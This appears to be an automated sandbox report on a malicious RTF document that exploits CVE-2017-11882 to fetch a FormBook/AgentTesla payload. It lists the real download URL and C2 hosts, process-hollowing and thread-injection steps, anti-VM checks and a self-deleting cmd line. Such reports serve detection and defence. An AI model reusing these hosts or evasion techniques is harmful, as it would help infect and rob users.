          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00417A32 push es; iretd 6_2_00417A3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CDFA1 push ecx; ret 6_2_008CDFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7DFA1 push ecx; ret 9_2_01F7DFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00097A32 push es; iretd 9_2_00097A3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CEB5 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF0B push eax; ret 9_2_0009CF72
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF02 push eax; ret 9_2_0009CF08
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009CF6C push eax; ret 9_2_0009CF72
          Source: initial sampleStatic PE information: section name: .text entropy: 7.62841280925
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xE7
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara matchFile source: 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105488822.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2492, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000000898E4 second address: 00000000000898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000000089B5E second address: 0000000000089B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -420000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2296Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 1692Thread sleep time: -50254s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2364Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2880Thread sleep time: -46000s >= -30000sJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2768Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 824Thread sleep time: -50000s >= -30000sJump to behavior
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.2114119554.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2114083954.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 00000007.00000000.2114003133.00000000041DB000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000007.00000000.2107221018.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: vbc.exe, 00000004.00000002.2105452818.0000000002171000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409A90 rdtsc 6_2_00409A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0040ACD0 LdrLoadDll,6_2_0040ACD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D26F8 mov eax, dword ptr fs:[00000030h]6_2_008D26F8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F826F8 mov eax, dword ptr fs:[00000030h]9_2_01F826F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 146.148.194.209 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.118 80Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: B30000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
          Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'Jump to behavior
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000002.2400913887.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000007.00000002.2401194206.00000000006F0000.00000002.00000001.sdmp, wlanext.exe, 00000009.00000002.2401088908.0000000000B50000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara matchFile source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400878730.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2400699313.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2151530848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 812 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 321 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 111 | LSASS Memory | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 812 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |
          | Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction |

          Behavior Graph

          Behavior Graph ID: 321301
          Sample: fqwBU8MyzT.rtf
          Startdate: 20/11/2020
          Architecture: WINDOWS
          Score: 100

          Analysis root (node 2)
          • DNS/IP: www.opalthemovie.com
          • Signature: Malicious sample detected (through community Yara rule)
          • Signature: Antivirus / Scanner detection for submitted sample
          • Signature: Multi AV Scanner detection for dropped file
          • Signature: 14 other signatures
          • Started: EQNEDT32.EXE (node 11)
          • Started: WINWORD.EXE (node 16)
          • Started: EQNEDT32.EXE (node 18)

          EQNEDT32.EXE (node 11)
          • DNS/IP: 103.207.38.170, 49165, 80, VNPT-AS-VNVNPTCorpVN, Viet Nam
          • Dropped: C:\Users\user\AppData\Local\...\pp[1].exe, PE32
          • Dropped: C:\Users\Public\vbc.exe, PE32
          • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          • Started: vbc.exe (node 20)

          vbc.exe (node 20)
          • Signature: Multi AV Scanner detection for dropped file
          • Signature: Machine Learning detection for dropped file
          • Signature: Writes to foreign memory regions
          • Signature: 2 other signatures
          • Started: RegSvcs.exe (node 23)
          • Started: RegSvcs.exe (node 26)

          RegSvcs.exe (node 23)
          • Signature: Modifies the context of a thread in another process (thread injection)
          • Signature: Maps a DLL or memory area into another process
          • Signature: Sample uses process hollowing technique
          • Signature: Queues an APC in another process (thread injection)
          • Injected: explorer.exe (node 28)

          RegSvcs.exe (node 26)
          • Signature: Tries to detect virtualization through RDTSC time measurements

          explorer.exe (node 28)
          • DNS/IP: auctionpros.club, 162.0.232.118, 49166, 80, NAMECHEAP-NETUS, Canada
          • DNS/IP: www.sgbanfang.com, 146.148.194.209, 49167, 80, HENGTONG-IDC-LLCUS, United States
          • DNS/IP: www.auctionpros.club
          • Signature: System process connects to network (likely due to code injection or exploit)
          • Started: wlanext.exe (node 32)

          wlanext.exe (node 32)
          • Signature: Modifies the context of a thread in another process (thread injection)
          • Signature: Maps a DLL or memory area into another process
          • Signature: Tries to detect virtualization through RDTSC time measurements
          • Started: cmd.exe (node 35)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          fqwBU8MyzT.rtf | 49% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
          fqwBU8MyzT.rtf | 100% | Avira | EXP/CVE-2017-11882.wizmq

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe | 100% | Joe Sandbox ML |
          C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pp[1].exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          C:\Users\Public\vbc.exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.RegSvcs.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          auctionpros.club | 162.0.232.118 | true | true |  | unknown
          www.sgbanfang.com | 146.148.194.209 | true | true |  | unknown
          www.auctionpros.club | unknown | unknown | true |  | unknown
          www.opalthemovie.com | unknown | unknown | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://www.auctionpros.club/glt/?7nU0ar=hWCSv9Zuwtl8NadmrOYz8tuCeFQ4j+1tRbDGtAkGbLuNRVgUfRWqhIxsika1FnwxqADVww==&CdL=M2Mpiri | true | Avira URL Cloud: safe | unknown
          http://www.sgbanfang.com/glt/?7nU0ar=Jg/IIDFoD2cxk/4co0w5JS6M3VwEeM8XBZAdxeVt8q7stueYx+spGuwe7uiPbRJ1VR6eAg==&CdL=M2Mpiri | true | Avira URL Cloud: safe | unknown
          http://103.207.38.170/pp.exe | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://search.ebay.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.gmarket.co.kr/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://search.nifty.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://searchresults.news.com.au/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://www.google.si/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.google.cz/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.soso.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.univision.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://search.ebay.it/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://busca.orange.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000007.00000000.2128384487.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://www.target.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://buscador.terra.es/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.iask.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://www.tesco.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://search.interpark.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1yexplorer.exe, 00000007.00000000.2112647152.00000000039F4000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://investor.msn.com/explorer.exe, 00000007.00000000.2112943695.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.espn.go.com/explorer.exe, 00000007.00000000.2128517017.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs


                                                                                                                                                      Public

IP               Domain   Country        ASN    ASN Name              Malicious
162.0.232.118    unknown  Canada         22612  NAMECHEAP-NETUS       true
146.148.194.209  unknown  United States  26658  HENGTONG-IDC-LLCUS    true
103.207.38.170   unknown  Viet Nam       45899  VNPT-AS-VNVNPTCorpVN  true

                                                                                                                                                      General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 321301
Start date: 20.11.2020
Start time: 20:03:31
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 27s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: fqwBU8MyzT.rtf
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winRTF@12/8@3/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 19.7% (good quality ratio 18.6%)
• Quality average: 69.8%
• Quality standard deviation: 29.5%
HCA Information:
• Successful, ratio: 98%
